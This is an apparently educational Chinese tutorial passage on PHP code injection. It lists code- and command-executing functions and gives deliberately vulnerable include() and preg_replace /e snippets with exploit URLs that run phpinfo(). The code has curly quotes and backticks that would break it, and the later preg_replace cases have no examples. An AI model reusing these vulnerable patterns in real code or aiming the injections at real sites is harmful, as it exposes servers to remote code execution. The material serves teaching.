Question

代码执行函数

PHP 中可以执行代码的函数。如 eval()、assert()、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等

文件包含代码注射

文件包含函数在特定条件下的代码注射，如 include() 、 include_once() 、 require() 、 require_once() 。

当 allow_url_include=On ，PHP Version>=5.2.0 时，导致代码注射。

include.php

<?php
include($_GET[‘a’]);
?>

URL： http://localhost/test/include.php?a=data:text/plain,%3C?php%20phpinfo();?%3E

正则匹配代码注射

众所周知的 preg_replace() 函数导致的代码注射。当 pattern 中存在/e 模式修饰符，即允许执行代码。这里我们分三种情况讨论下

1 ). preg_replace() pattern 参数注射

pattern 即第一个参数的代码注射。

当 magic_quotes_gpc=Off 时，导致代码执行。

demo code 3.1: preg_replace1.php

<?php
echo $regexp = $_GET[‘reg’];
$var = ‘<php>phpinfo()</php>’;
preg_replace(`/<php>(.*?)$regexp`, ‘\1’, $var);
?>

URL： preg_replace1.php?reg=%3C/php%3E/e

2 ). preg_replace() replacement 参数注射

replacement 即第二个参数的代码注射，导致代码执行。

3 ). preg_replace() 第三个参数注射

我们通过构造 subject 参数执行代码。